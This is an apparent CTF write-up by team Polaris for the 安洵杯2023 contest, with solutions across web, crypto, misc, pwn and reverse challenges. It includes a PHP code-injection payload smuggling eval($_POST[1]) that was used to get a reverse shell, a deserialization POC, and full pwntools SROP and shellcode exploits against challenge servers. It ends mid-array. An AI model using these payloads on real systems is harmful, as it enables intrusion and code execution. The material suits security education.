安洵杯2023-WP –Polaris

WriteUp 1个月前 admin
29 0 0

WEB


what’s my name

构造payload:

d0g3=12345include'"]);}eval($_POST[1]);/*&name=%00lambda_36

使用bp连续爆破使其反弹shell

安洵杯2023-WP --Polaris
安洵杯2023-WP --Polaris

拿到shell查看环境变量发现flag

安洵杯2023-WP --Polaris


easy_unserialize

构造POC:

<?phperror_reporting(0);class Luck{public $l1;public $md5;}class You{public $y1;}$a = new You();$a -> y1 = new Luck();$a -> y1 -> md5 = new Luck();$a -> y1 -> md5 -> l1 = "phpinfo";echo serialize($a);?>//O:3:"You":1:{s:2:"y1";O:4:"Luck":2:{s:2:"l1";N;s:3:"md5";O:4:"Luck":2:{s:2:"l1";s:7:"phpinfo";s:3:"md5";N;}}}
安洵杯2023-WP --Polaris
安洵杯2023-WP --Polaris

Crypto



010101

本题关键在

p1[random.choice([i for i, c in enumerate(p1) if c == '1'])] = '0'p2[random.choice([i for i, c in enumerate(p1) if c == '0'])] = '1'

意思就是p1中有一个1被改为了0

对于p2来说,是有可能不改变的,因为索引值是p_1的

直接爆破即可,遍历p1中的0,把0改为1即可,需要注意的是p2要分两种情况,一种是不变的时候,一种是变的情况

exp:

from Crypto.Util.number import *import gmpy2from tqdm import *n =603929041261800903893255846837373435975689488156082111538579411971234122241475748036901372456410420191268918203740933624479627880138860787078343962957545877493495346831028915623609911739520855865598159115403599691845611787894864022849387193442196306247844978619825889396851220746270712372629345235420222076680115154790661980407543403831934888441296510749707016149742835334975569330963811702631399381154725473397239011407333239568323785920549918563058163802790187563167758518996273164519358725587751057556099683209931508156206102023550113078755175573231054144175740037978473444981801474458374782704295305402882601070280107624282520071733642472567932754610400320318631599250987727798785732693028629127928075161764000633755172649305820758541646921112640799416373141028867694424520169726284794592230472739528017824591893518858631575238481300188255385565135530781399021638113121796002810581237621059229401475373166398218013467690838657741784353265467188916419980824688886467277205321029087429010136873982224751707535560753990915173665180626848355707628545030678081326994468311753531184000767912265077615115921131730201921373353972239662406236256449307913217499123008959838210605102941439012579314919044679872148810171587616630982300997769P ="11010001001011001110010111110000100100111111011100110000001011110010001010111010001000110011110011100101101111000010000110010011010001100111010001101101010110110000001000111101001111001111100111010001110001110000011101110111100010100110111111010101101000100101011101111100100100011101001001010101010100100100010111001101101001001101010111101001101010111111111010101111000110010011001001010010101110010110111110111001011011000111101110100100001100100111101100010100100000111001111111111000101001101111111001010000111110000110111110110101101001111010010001111111010011101111111011101000011101100010000000101000010010001100101001001100000000110111110101001101001010110111011100101001111111111110010100101101001110000000100011000001011110110101110111010001101000000101111101011010010000000110100011110101000000110011100001001010000111110101111011001110001000101010010110100010010000011010000000010110010110110010100000010111100011000101001110100100001110011010101011010111101000100010001000100100001110001100000011001000000011010110000100011000010010011100101101000001011110011010111111011001001101000101010011001010100000101011011010001101000110100001010111000111011111000111000110010111011111001001000111101101111101101100110000010001010100000000010111001011010110101000110010010100000110010001010001010111110010001110100100001110110100011100110010101101010010000110010000000000001101001001111000001001110111100101011010000101000001101100000011010110110001001100001010110010111110000100010010001111000111110111001110111010000010110111101110010011101010001101000100011111100111101110100100001001010110000110011110011000110010000111111110011100001110011010010010001011000011101000001100100110101001010110101000100010110000111001100011101000110010101101110000001110101010010100011111000011011010110001111000001000111011110111000111111011011101101011011011010101010001001000001001101111101101011010000001111001101010000100100011011010011011011011110011101001110011000101101010001000111100101010111001110100001001011101000111110110111111101001100110111011"c =86686439679874830246557653015232666024548117379353423678475364097072178826632356840355752060131181776717167764598857424931346233132869924918276685776350661070390576961130941951957979601769745016239304945501929062576701514720613007436301407348380329606694430576562909174904437860869521166636000289719433717305895080524202468368216882473127238573270504191177749274378107593390170231953722023523109786520395037511557586384515517033167064188185912051635528465308305202059386081496894767608262032863369259646855260874931901314784267182224186084544278686060811418808427473393401031779270067234650782676467179083936163361798893672177127354928129838729299397848748974202105320442165321749085841967661828478087899131573349766763269557239693467725757622240790567302886026262903788677893782986023554124746338684896334712802104286022426080359219997110717128626202867661389035295735029082783484639744693093659639224377233571685420055087016612362091684619532730540899821020173872616220719344374207934384262583860759996308412468708264575433904901696415884548016664119511545715549106666120050640487895135909555493016879887730329494392167451911914419832673885582817232756022767909864103483310200762274943174788555599167912909253375001595679099288103e = 65537a1 = [i for i, c in enumerate(list(P[:1024])) if c == '0']a2 = [i for i, c in enumerate(list(P[1024:])) if c == '1']# p2不变的情况for i in tqdm(a1):pp = list(P[:1024])pp[int(i)] = "1"p = int(("".join(pp) + "".join(list(P[1024:]))),2)if isPrime(p):print(f"p = {p}")q = n // pd = gmpy2.invert(e,(p-1)*(q-1))m = pow(c,d,n)flag = long_to_bytes(m)if b"D0g3{" in flag:print(flag)break# D0g3{sYuWzkFk12A1gcWxG9pymFcjJL7CqN4Cq8PAIACObJ}


POA

审计代码发现是CBC预言填充攻击,0xGame和NewStar都有出现过。

exp:

from pwn import *import stringfrom itertools import productimport hashlibfrom tqdm import *# context.log_level = 'debug'table = string.ascii_letters + string.digitshost = '124.71.177.14' #ip地址port = 10010 #端口GeShi = b'Give Me XXXX:' # 改格式!p = remote(host,port) #建立连接data = p.recvuntil(GeShi).decode()proof = data.split('SHA256')[1]Xnum = proof.split('+')[0].upper().count("X") #要爆破的数量tail = proof.split('+')[1].split(')')[0].strip()hash = proof.split('+')[1].split('n')[0].split(":")[1]print("未知数:",Xnum)print(tail)print(hash)print("开始爆破")for i in product(table,repeat=Xnum):head = ''.join(i)t = hashlib.sha256((head + tail).encode()).hexdigest()if t == hash:print('爆破成功!结果是:', end='')print(head)p.send(head.encode())breakprint("以下是提交完XXXX之后的流程n")p.recvuntil(b"2. decrypt the flagn")p.sendline(b"1")temp = p.recvline().decode().split("flag: ")[1].strip()print(f"temp = {temp}")token = binascii.unhexlify(temp)print(f"token = {token}")def dec(iv, token):p.sendline(b"2")p.sendlineafter(b"Please enter ciphertext:", binascii.hexlify(iv+token))p.recvline()return b'True' in p.recvline()counter = len(token) // 16true_flag = ''t = token[::]for ct in range(1, counter):oldIv = t[16*ct-16:16*ct]token = t[16*ct:16*ct+16]flag = [] # 记录原始解密值suf = []for i in tqdm(range(1,17)):for j in range(256):payload = b"D0g3{U_Get_Fl4g}"[:16-i] + bytes([j]) + bytes(suf) + tokenif dec(payload[:16], payload[16:]):flag.append(j ^ i)suf.insert(0, j)for v in range(len(suf)):suf[v] = suf[v] ^ i ^ (i+1)print(flag)breakans = ""flag.reverse()for i in range(16):ans += chr(oldIv[i] ^ flag[i])true_flag += ansprint(true_flag)print(true_flag)# D0g3{0P@4Ttk}


得到的是QT{0P@d4Ttk},手动改为D0g3{0P@4Ttk}即可


Rabin

题目是Rabin,估计和2有关,大胆猜测了一下e1 = 2

然后简单爆破了一下知道x = 8,e2 = 7

r已知,接下来分解p*q


安洵杯2023-WP --Polaris

两式相乘得


安洵杯2023-WP --Polaris

移项得


安洵杯2023-WP --Polaris

经测试,k1,k2大概是1023bit的数

可以认为

安洵杯2023-WP --Polaris

把上式同除pq,即可得到k1k2

然后即可求得k2p + k1q


安洵杯2023-WP --Polaris


安洵杯2023-WP --Polaris


得到p,q后,前半部分是解Rabin,后半部分求逆元或者有限域开根都可以

exp:

from Crypto.Util.number import *import gmpy2e1 = 2e2 = 5x = 8a = b = 0for i in range(x - (2**2 -1 )):a += pow(e1,i)for j in range(3):b += pow(e2, j)# print(a == b)n =305742085102073958685058774990374612856503657611159209468741748564654591176180299818778135460948807176614281796016904753313757927457094861196369069821421681665875176139845644195736238144691839008758614457979812997005126606399842320648487994406393728514493129219688752202978501994811535834779889459729683428077498441713132964635907469366512175886337946124631196824508247375645971308484279007920881639616776491331812849657775358960227848680733861313065565269244274482334952541032707333167429562469558762781469669359057084779217532331399410333624558772093729396962312936037020992117478202860898927073068360026814644581294222733341428537874383052653054496502673372786144676806905626251642090622209277799682962538245425774337944285158783294880516595307576719556933669812074808919685419881388267486868941401975800053647291641426673593791774634377598637815942343627245274057532320854646240153245893536480745586533270387549779636700040935751519181245119278044454115223974366280075995685049945977835434961621019inv_p =80275679918090105134294823865673211657060049627413874971428297415355157707252877991145232186659935067961745973100698632943949790304190096567884607037119257848837354982500048978070619820510408650386626542338056277335180497955588848138448991963800265073331348097617541306117998857780109771194563339021595188562inv_q =91430270065720942392278749444269989843094838912787188266496611817766528132774187319335115624057615900976202412507879118712912101862728738204907877396022887953429108729897171677408597080700062032905675017013140349657979587207083820584906055634857776106802178757131724480934751871117394549988315719808677297400c1 =27982926262483311148784661440434049509041271145373939684263123722309350890886129800416935949757799004078048732281935770255739076672223113235604245680214981770721357810264502828783436566049916012826991722307971435988653591370445652627932863934280322586450541943726361669705223005256707033393323681199742226865639061796493744221386650671921408599281675072195109604944995246990117259752921959078570716019348911611821807743542202606017861680093899453962535751057029803212313708486252499961531916769339026243456254415795474566725045397580987945276292940425615563426872706612654673760957132954706561315315926583847756728581334589763622690426645925379033552965887091774261328484101677385760510308565939450969280431514193153901465147874994288888863961626533437546523090704677258271361008899424058968841403657808839941136606557821902221756903088734659178298942185013814206583151273573533540756898457572685280130826705824899847574123392575025182545331871707478881582060832153045557952057641871852784168481101647c2 =161619014853290061321220693856242384241899565606310997462914314289208211523608827698222734190386889612098570760765052452215805711014546122099647560430788381292730765852839847593053599250289125651012417026034998933486356540308165710913202176920168248765753912975464775516099366852853130484143941438754410599163284892652060800647319146257668079858962426955881454668916171211181142453679621166656675384626603665740562005722087726838877971126595828345860415781411146330129891129797182526922825440860137352029911523070206447988669663751215339049795213569586767141039747546364893768334626213397240105328357731197925663794385770706516043309955122745946633182399168534133436912290389494270925639788309351783493083085094045092781888997140679841389857851588928742292158429434570541383701331355804702559218884246423448924119442796513423570240629502315241227996438176424546368309332048747610392861954126660466095971227213870875955019656804172566974654412258429352773642042554134725696296293760333163865827998422748# print(inv_p.bit_length())# print(inv_q.bit_length())def getr():r = 2while True:r = r * xif r.bit_length() > 1024 and isPrime(r - 1):r = r - 1breakreturn rr = getr()# print(r)pq = n // rtemp = inv_p*inv_q * pqk1k2 = (temp- pq) // pqprint(k1k2) #检验过这个式子没问题k1q_k2p = temp - k1k2 * pq - 1delta = k1q_k2p**2 - 4 * k1k2*pqk1q = (k1q_k2p + gmpy2.iroot(delta,2)[0]) // 2k2p = (k1q_k2p - gmpy2.iroot(delta,2)[0]) // 2q = gmpy2.gcd(k1q,pq)p = gmpy2.gcd(k2p,pq)print(f"q = {q}")print(f"p = {p}")def decrypt1(c,p,q,inv_p,inv_q,n):mp = pow(c, (p + 1) // 4, p)mq = pow(c, (q + 1) // 4, q)inv_p = gmpy2.invert(p, q)inv_q = gmpy2.invert(q, p)a = (inv_p * p * mq + inv_q * q * mp) % nb = n - int(a)c = (inv_p * p * mq - inv_q * q * mp) % nd = n - int(c)aa = [a, b, c, d]for i in aa:flag = long_to_bytes(int(i))if b"D0g3" in flag:print(flag)breakdecrypt1(c1,p,q,inv_p,inv_q,pq) # D0g3{82309bce-9db6-53phi = (p-1)*(q-1)*(r-1)d = gmpy2.invert(e2,phi)m = pow(c2,d,n)print(long_to_bytes(m)) # 40-a9e4-a67a9ba15345}# D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}


MISC



签到处


安洵杯2023-WP --Polaris


misc-dacongのWindows

一个win10镜像,我这里还下载了最新版的vol3做的

首先windows.filescan一下看一下desktop,发现有很多wav,听了一下一眼SSTV,最后发现dacong39.wav是我们的flag1

安洵杯2023-WP --Polaris

flag2是找到一个secret.rar,里面有一个有snow隐写的,空密码解密即可

安洵杯2023-WP --Polaris

flag3在桌面有一个flag3.txt,得到一些AES密文

安洵杯2023-WP --Polaris

之后找key,根据题意,找注册表windows.registry.printkey

安洵杯2023-WP --Polaris

正好16位,一眼key,aes解密即可

安洵杯2023-WP --Polaris


Nahida

下载附件,利用工具reverse得到一个jpg,图片末尾有一些奇怪的东西,复制出来发现是utf-8编码

安洵杯2023-WP --Polaris

神之眼考虑silenteye,不知道key,尝试题目名Nahida,得到flag。

安洵杯2023-WP --Polaris


misc-dacongのsecret

第一个图片,正常隐写尝试过没有东西,单图盲水印

安洵杯2023-WP --Polaris


得到第一个压缩包的密码,之后在jpg图片的末尾发现一些16进制,逆向得到一个压缩包

通过hint3,pngcheck

安洵杯2023-WP --Polaris

最后一段IDAT有问题,之后结合爆破宽高,应该是提取出这一段IDAT段,之后覆盖到一个新的png图片 上,之后爆破宽高得到key。

安洵杯2023-WP --Polaris

之后解密,base64隐写,得到新pass。

安洵杯2023-WP --Polaris

m1ku_1s_sha_fufu123

考虑jpg隐写,jphide,得到flag。

安洵杯2023-WP --Polaris


PWN



side-channel, initiate!

只有or无w,那么我们容易想到利用mprotect赋权然后执行shellcode,但是程序中禁用了write,所以栈迁移之后只有一次返回的机会,所以要先用bss段的输入提前构造好shellcode和srop链,然后是无write的shellcode,这里要在shellcode中写入loop循环然后用cmp来和读入到程序中的flag进行匹配,匹配成功时就会卡住,然后以此为循环爆破出flag。


exp:

from pwn import*#io = process('./chall')#io = remote('47.108.206.43',30040)# context.log_level='debug'context(os='linux', arch='amd64')elf = ELF('./chall')syscall2=0x40118Asyscall=0x401060rax_15 = 0x401193main = 0x401421flag = ""def exp(dis,char):shellcode = asm('''mov r12,0x67616c66push r12mov rdi,rspxor esi,esixor edx,edxmov al,2syscallmov rdi,raxmov rsi,0x404500mov dl,0x40xor rax,raxsyscallmov dl, byte ptr [rsi+{}]mov cl, {}cmp cl,dljz loopmov al,60syscallloop:jmp loop'''.format(dis,char))frame = SigreturnFrame()frame.rdi = 10frame.rsi = 0x404000frame.rdx = 0x1000frame.rcx = 7frame.rip = syscallframe.rsp = 0x4041bap1 = b'x00'*0x52+p64(rax_15)+p64(syscall2)+bytes(frame)+p64(0x404260)p1 = p1.ljust(0x200,b'x00')p1+=shellcodeio.sendafter('easyhackn',p1)io.sendafter('SUID?n',b'x00'*(0x2a)+p64(0x404050+0x30)+p64(0x401421))io.send(b'x00'*(0x2a)+p64(0x404050+0x30+0x2a)+p64(0x401421))#gdb.attach(io)#pause()io.send(p64(0x404050+0x30+0x2a+0x10))for i in range(len(flag),50):sleep(1)log.success("33[1;31;40m flag : {}33[0m".format(flag))for j in range(0x20,0x80):# io = process('./pwn')io = remote('47.108.206.43',31866)try:exp(i,j)io.recvline(timeout=1)flag += chr(j)io.send('n')log.success("{} pos : {} success".format(i,chr(j)))io.close()breakexcept:io.close()io.interactive()


seccomp

pwn1 的简单版srop打orw

exp:

#!/usr/bin/env python3# -*- coding: utf-8 -*-#@Author:X1NRIimport sysimport osfrom pwn import*from ctypes import *#from LibcSearcher import LibcSearcherdef dbg(command): #dbg(None)gdb.attach(io,gdbscript=command)#pause()#------------------------------------------------------------------def pwn():syscall_p_ret=0x000000000040118asigreturn_ret=0x0000000000401194leave_ret=0x000000000040136cbss=0x0000000000404060#------------opensigframe_open = SigreturnFrame()sigframe_open.rax = 2sigframe_open.rdi = bss+0x110 #flag_addrsigframe_open.rsi = 0sigframe_open.rdx = 0sigframe_open.rsp = bss+0x200-8sigframe_open.rip = syscall_p_retpayload=p64(sigreturn_ret)+p64(syscall_p_ret)+bytes(sigframe_open)payload+=flat([0,b'./flagx00x00'])payload=payload.ljust(0x200,b'x00')#--------------readsigframe_read = SigreturnFrame()sigframe_read.rax = 0sigframe_read.rdi = 3sigframe_read.rsi = bss+0x800sigframe_read.rdx = 0x100sigframe_read.rsp = bss+0x400-8sigframe_read.rip = syscall_p_retpayload+=p64(sigreturn_ret)+p64(syscall_p_ret)+bytes(sigframe_read)payload=payload.ljust(0x400,b'x00')#-------------writesigframe_write = SigreturnFrame()sigframe_write.rax = 1sigframe_write.rdi = 1sigframe_write.rsi = bss+0x800sigframe_write.rdx = 0x100sigframe_write.rsp = bss+0x600-8sigframe_write.rip = syscall_p_retpayload+=p64(sigreturn_ret)+p64(syscall_p_ret)+bytes(sigframe_write)#--------------------------sa('easyhackn',payload)payload=b'a'*(0x2a)+p64(bss-8)+p64(leave_ret)#dbg('b *0x40136dncn')sa('SUID?n',payload)itr()if __name__ == '__main__':context(os='linux',arch='amd64')context.terminal=["tmux","splitw","-h"]binary='./chall'context.log_level='debug'elf=ELF(binary)libc=elf.libcif(len(sys.argv) == 3):io = remote(sys.argv[1],sys.argv[2])else:io = process(binary)s = lambda payload :io.send(payload)sl = lambda payload :io.sendline(payload)sa = lambda data,payload :io.sendafter(data,payload)sla = lambda data,payload :io.sendlineafter(data,payload)r = lambda num :io.recv(numb=num)ru = lambda data,DROP :io.recvuntil(data,drop=DROP)rl = lambda :io.recvline(keepends=True)uu32 = lambda :u32(io.recvuntil(b'xf7')[-4:].ljust(4,b"x00") )uu64 = lambda :u64(io.recvuntil(b'x7f')[-6:].ljust(8,b"x00") )ep = lambda data :elf.plt[data]eg = lambda data :elf.got[data]es = lambda data :elf.sym[data]ls = lambda data :libc.sym[data]itr = lambda :io.interactive()ic = lambda :io.close()pt = lambda s :log.info('33[1;31;40m %s --- %s 33[0m' % (s,type(eval(s))))lg = lambda name,addr :log.success('33[1;31;40m{} ==> {:#x}33[0m'.format(name,addr))pwn()


REVERSR



mobliego

将输入经过checkflag加密有与R.string.cmp比较

安洵杯2023-WP --Polaris

在资源文件中找到R.string.cmp


安洵杯2023-WP --Polaris

容易看出密文就是flag打乱了顺序,那么可以用一个不重复的明文输入给程序,用objection hook掉返回值,根据得到的密文还原flag的顺序

安洵杯2023-WP --Polaris

exp:

test="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijkl"get="ViLdOlJTePKcMYZFQBSHUCXWIaAGkfbDghjNER"enc="49021}5f919038b440139g74b7Dc88330e5d{6"for i in test:print(enc[get.index(i)],end="")#D0g3{4c3b5903d11461f94478b7302980e958}


感觉有点点简单

魔改RC4和魔改base64

安洵杯2023-WP --Polaris
安洵杯2023-WP --Polaris

RC4直接粘就行了,Base64根据位运算关系还原明文.

exp:

enc="6zviISn2McHsa4b108v29tbKMtQQXQHA+2+sTYLlg9v2Q2Pq8SP24Uw"table="4KBbSzwWClkZ2gsr1qA+Qu0FtxOm6/iVcJHPY9GNp7EaRoDf8UvIjnL5MydTX3eh"index=[table.index(i) for i in enc]+[0]data=[]for i in range(0,len(index),4):get=index[i:i+4]data.append(get[0]|((get[1]&0b11)<<6))data.append((get[1]>>2)|((get[2]&0b1111)<<4))data.append((get[2]>>4)|(get[3]<<2))key="the_key_"byte_140003010=[]for i in range(64):byte_140003010.append(i)v7=[]for j in range(64):v7.append(ord(key[j%len(key)]))v6=0for k in range(64):v6=(v7[k] + byte_140003010[k] + v6) % 64byte_140003010[k], byte_140003010[v6]=byte_140003010[v6],byte_140003010[k]v5=0v6=0for i in range(len(data)):v5 = (v5 + 1) % 64v6 = (byte_140003010[v5] + v6) % 64byte_140003010[v5], byte_140003010[v6] = byte_140003010[v6], byte_140003010[v5]data[i]^=(v6 ^ v5) & byte_140003010[(((v6 ^ v5) + byte_140003010[v6] + byte_140003010[v5]) %64)]print("".join(map(chr,data)))#D0g3{608292C4-15400BA4-B3299A5C-704C292D}


牢大想你了

dnspy打开看到一堆tea

安洵杯2023-WP --Polaris

在GameManager中找到很多类似验证flag的地方

安洵杯2023-WP --Polaris

发现两个字段,猜测是key和密文

安洵杯2023-WP --Polaris

根据key一般只有4位,和对tea的了解,以及代码的正确性,在众多tea中找到了一个最像的

安洵杯2023-WP --Polaris

然后解tea就得到了flag

exp:

from ctypes import *import libnumenc=[i for i inbytes.fromhex("4F9173C80086624A1C7AC720AA7A871A82A9FAD664C9D160324C88B962A8082A36004AC796E12E8FA9A608EF960885A3")]enc1=[int.from_bytes(enc[i:i+4],"little") for i in range(0,len(enc),4)]a1=enc1a2=[0x11111111]*4decode={}v5=c_uint32(0)times=32delta=2654435769for j in range(0,len(a1),2):v5=c_uint32(delta*times)v1=c_uint32(a1[j])v2=c_uint32(a1[j+1])for i in range(times):v2.value -= (v1.value<<4)+a2[0]^v1.value+v5.value^(v1.value>>5)+a2[1]v1.value -= (v2.value<<4)+a2[2]^v2.value+v5.value^(v2.value>>5)+a2[3]v5.value -= deltadecode[j]=v1decode[j+1]=v2for i in decode:print(libnum.n2s(decode[i]))#D0g3{it_is_been_a_long_day_without_you_my_friend}


你好,PE

去掉__CheckForDebuggerJustMyCode反调试,动调一直跟到主程序.

from ida_hexrays import *from ida_dbg import *from idaapi import *from idautils import *from idc import *from ida_kernwin import *for item in CodeRefsTo(0x0450C10, 1):patch_bytes(item,bytes([90]*5))
安洵杯2023-WP --Polaris

加密逻辑如下:

安洵杯2023-WP --Polaris

看汇编,八个字节一轮加密

安洵杯2023-WP --Polaris

后4个字节的dword和0比较:

                      安洵杯2023-WP --Polaris

如果大于0(最高位为0)

      安洵杯2023-WP --Polaris

其中unk_10059f9f中只有两句关键

         安洵杯2023-WP --Polaris

其中shld为双精度左移指令,即eax(前4个字节)不变,edx(后4个字节)左移后缺的低位由eax高位来补,这里cl始终为1。如果小于0,前四个字节会多异或一个0x54AA4A9。

除了edx的高位,其他都可以通过位运算和异或还原,所以主要解决edx高位的问题,当edx高位为1即小于0时,前四个字节左移1位(低位为0)后异或0x54AA4A9(低位为1),结果低位为1,如果edx高位为1,前四位低位就是0,由此思路写脚本。

exp:

import libnumenc=[77, 184, 118, 41, 245, 169, 158, 89, 85, 86,177, 196, 47, 33, 44, 48, 179, 121, 120, 23,168, 237, 247, 219, 225, 83, 240, 219, 233, 3,81, 94, 9, 193, 0, 223, 240, 150, 252, 193,181, 230, 98, 149, 1, 0, 0, 0]data=[int.from_bytes(enc[i:i+4],"little") for i in range(0,len(enc),4)]for i in range(0,len(data),2):a=data[i]b=data[i+1]for j in range(64):if a&1==1:a ^= 0x54AA4A9a=((b&1) <<31)| a>>1b = 1 << 31 | b >> 1else:a = ((b&1) << 31) | a >> 1b = b>>1data[i]=adata[i+1]=bfor i in data:print(libnum.n2s(i).decode()[::-1],end="")#D0g3{60E1E72A-576A8BF0-7701CBB9-B02415EC}


你见过蓝色的小鲸鱼

去掉__CheckForDebuggerJustMyCode反调试,动调到加密程序.

安洵杯2023-WP --Polaris
安洵杯2023-WP --Polaris

像是魔改的sm4,照着解密即可,this数组输入正确的密钥动调即可得到

exp:

#include <stdio.h>#include <stdint.h>uint32_t ans1[1024] = { 3612299254, 909017393, 3176992461, 3316901652, 2609835858, 2796138362,3652223468, 4026124070, 4005344247, 3018204662, 3971881576, 1883703289, 3380028605, 2310268358,3192089339, 3865334851, 991473981, 4261573226, 3513563506, 3274279743, 4056254897, 393233045,3857783913, 3209970495, 3545254565, 1726489627, 2617077090, 536406376, 2185599772, 810099132,3109160618, 2098277993, 592628296, 3835560518, 1236356276, 2806853253, 3386832562, 2875662589,1716755816, 1338756477, 135048504, 3661026591, 985113045, 3225175390, 3059325024, 947849520,1317660494, 437204192, 2901243097, 3844245920, 120516819, 3690592916, 1742621374, 961341586,82579909, 2602161357, 688080856, 1834854888, 1205398077, 1803263324, 3278861203, 1118662528,2233320600, 1503686121, 3021908902, 169435313, 4132028466, 3591033800, 604594897, 1387163463,3610184282, 82732284, 3734169552, 26558337, 3263666052, 1675780680, 1245030056, 4023753971,3106900708, 1161959714, 1921670186, 2139379863, 3111216585, 144875354, 3891556883, 2915976098,1543965061, 3180167923, 2907634212, 706636810, 2809431891, 3339771535, 3003842848, 666170416,2214373859, 3719315293, 1191578267, 2426783095, 3079199401, 1830926746, 3204220640, 3731036918,1660271787, 492612286, 2570398579, 3227925737, 3774103751, 1359649358, 3445737257, 2401180843,1760303728, 3485791200, 472932926, 3753885968, 4161071017, 2648262891, 262921962, 2374085492,2248303185, 390396083, 2712543590, 2161070294, 174295997, 3158425513, 940358329, 1878094520,3005772882, 3959545626, 2147432275, 938305420, 1663595663, 235114013, 165426881, 1434286583,397714971, 3286531863, 3890683405, 2503783237, 3156100839, 1862835550, 2877364194, 2360580686,2946284660, 1773107797, 1704357043, 970020583, 3671336424, 2997981521, 2379920259, 4265442517,925584979, 2425516426, 2121507294, 3583831078, 950172452, 3859984899, 2852403993, 2834441141,3757363531, 239582191, 1408912961, 3290831151, 810650838, 151049394, 3826060979, 7664562,1203440678, 756917008, 1270613790, 1462665932, 3976216079, 2201884704, 1198888899, 1862145384,1842954329, 3254547884, 3352184565, 1559929120, 2732851026, 3472229415, 3324261065, 1912193298,1520363419, 1013564590, 2466244710, 3515836733, 3290010742, 1475359871, 2469026558, 265453838,3764144433, 1951032479, 1789095261, 882704806, 2080169719, 1355828509, 216692911, 2077881151,2179175345, 658329417, 2639415873, 1608429810, 2328829540, 3922963539, 3590750574, 3005810895,3054927960, 3145751839, 2438530629, 3178227540, 2656268540, 2918949977, 2025459779, 702388526,352396826, 2845512848, 3136351238, 582022810, 942471529, 2425653069, 4060440851, 1489288468,2812878567, 1690137298, 3825703696, 2033813973, 2840178772, 3205759263, 3158390194, 4194323040,2773043817, 633123956, 78997677, 3806715992, 157202888, 2479881715, 3347034983, 4027390473,676130488, 559181126, 1893767750, 3132813806, 1737160727, 3039073421, 1904851998, 2726372549,1482038449, 1772371038, 1399137205, 502080223, 1158624194, 1959469547, 2125030951, 1146241092,136874116, 3312727756, 3123845189, 1616952983, 1116822306, 1447890576, 798589893, 2759565721,2635262896, 267525495, 969441731, 3528824463, 2723329496, 3988026719, 3069802268, 3904044072,1247175377, 3018910654, 1144761192, 1693003556, 653667911, 1322824793, 2685461955, 3423544340,3895206564, 1263613072, 484014289, 4002680300, 82525547, 3713365205, 2785407392, 3203680529,568074554, 2948600661, 690536872, 3761766135, 4093211731, 3026577007, 3623968899, 3114714815,1660107032, 1630017735, 4015244569, 795121368, 181611949, 2302983550, 299228304, 1035595335,4107946561, 4248631138, 759316079, 3455675297, 1802306174, 1248446376, 2220813029, 1106431524,2974149249, 913000283, 1101868625, 1963166077, 1204015669, 2936566510, 1849439059, 1188145533,1970281242, 3473902661, 3605729351, 779644256, 317399433, 2294142642, 3187988184, 3234556957,2451570191, 539845509, 4051034255, 4207789360, 918997589, 4024179045, 47092157, 3461478898,219928750, 3174028876, 3798490823, 4236068923, 1733771380, 2213684509, 3418631303, 1791707244,2954339021, 604474946, 715741480, 1538117713, 2018946469, 3133692790, 2057135452, 4081014361,1737711834, 443814679, 3951854071, 1261695230, 3484936769, 811019382, 3431304140, 2125583415,3242734973, 4068818582, 1140887881, 2754994089, 1849203727, 2776434143, 4101627524, 1104008366,3343386008, 1690010785, 1589833538, 2830854046, 3005511388, 1327586722, 3365805672, 2894519128,377014138, 3258751486, 682576491, 1144946337, 2527160065, 1145337453, 1543577757, 1661179461,716027965, 2345828765, 3765457141, 3719354469, 3575166803, 674417138, 2258687374, 4034399391,3447359359, 4155138269, 2155299098, 1682039011, 3063342633, 97543685, 3653422538, 2954039847,2269743455, 2661523390, 436334478, 1525296779, 1449357693, 4202155545, 1935437360, 3296147951,2570170770, 1361243263, 2810328459, 3126080089, 3862996957, 1501245806, 146428735, 1286347126,1666807071, 2983557661, 3352824585, 2918359338, 1936219053, 3034276746, 4001013798, 2185013997,1018960196, 505963722, 560767059, 602988785, 800926720, 4165486503, 85828300, 3227976635,649010145, 1125597870, 966697127, 167433808, 874570896, 3458750878, 3395258985, 252088262,4222815752, 2639595847, 823198564, 486454327, 833313397, 205508261, 2786404808, 2510035198,733713357, 1354849271, 3215264880, 1669427806, 1452787206, 3301133258, 3020307851, 2543834212,1483052027, 2983195960, 3960532648, 3326718810, 1483969807, 1747416431, 1426364238, 1473516291,3546046313, 376764897, 1169008197, 4294111582, 1594224422, 2284959488, 896177674, 204425518,2774265376, 3033824452, 2439216892, 4053408298, 1693000377, 2609129969, 3032619608, 308898488,3702536945, 977921220, 2735144083, 670850509, 2980849390, 1060995153, 1355919448, 1635397140,4088809980, 1420233277, 663910423, 2710634922, 383964395, 4181644457, 2052912767, 3955690015,645774729, 3320447412, 525766475, 3072324203, 2984772920, 608845350, 1847968149, 1506522579,1499948296, 1132257855, 3799040339, 2104379384, 1857522470, 4264354361, 13542311, 4105907176,916156479, 3593386610, 2662026461, 1622743063, 105136493, 2412473138, 4064549266, 3123460414,3921011079, 718464174, 278010642, 2894547666, 1832841070, 3833519489, 2789630359, 3932469301,314230278, 843881168, 1591227520, 2173809348, 1802556348, 3426041307, 3571278871, 130404080,582313559, 1068143687, 3081884854, 85711274, 3891579692, 2539344878, 1011763299, 266906039,355962384, 3286276118, 862412479, 2027782370, 3255596042, 607628161, 1009421605, 2722485621,4288910093, 475523691, 1238990637, 3029919481, 1227651643, 457015533, 453798348, 4137614187,286748010, 2948221670, 147673401, 2618102637, 1554248227, 67648155, 1534379566, 4269591083,2170536445, 2387217625, 3192685544, 3879696649, 3276561223, 450492746, 4040053455, 893402262,110762684, 454018881, 3993940863, 2619682979, 2392445782, 1975308775, 2633142153, 1099704695,3660468837, 1356389045, 4235162877, 3156792154, 2167871338, 1325276422, 477945007, 1015766725,312791145, 1919976644, 2536378684, 3553880401, 1245281630, 1723424489, 4242078577, 127882815,2076642282, 2897062914, 3422554873, 2511825743, 3279714577, 676398387, 2477683067, 2690393167,1557866509, 2377366658, 1833176462, 1867241793, 1728770188, 2030196186, 487071513, 2557723795,126875659, 3310563015, 832818887, 1279107586, 1189176266, 402509529, 3673978930, 3562678424,1101937332, 1433686036, 2828533185, 2344180009, 2360208424, 2067254040, 2605496877, 2633778875,1374180181, 958478401, 3769939655, 3095119178, 3404498833, 3498729428, 2919725926, 3899615018,1622936878, 1714950277, 1416079787, 1028838279, 2370886484, 1179276667, 3630483254, 2211301498,3110750966, 3842377908, 2062040230, 616149483, 51223745, 661298142, 1348065750, 3529860603,2758213304, 193574778, 1229799653, 3471014957, 865196813, 2981594497, 3144691620, 45598418,1428776199, 2981650001, 886009176, 1673674753, 2482633515, 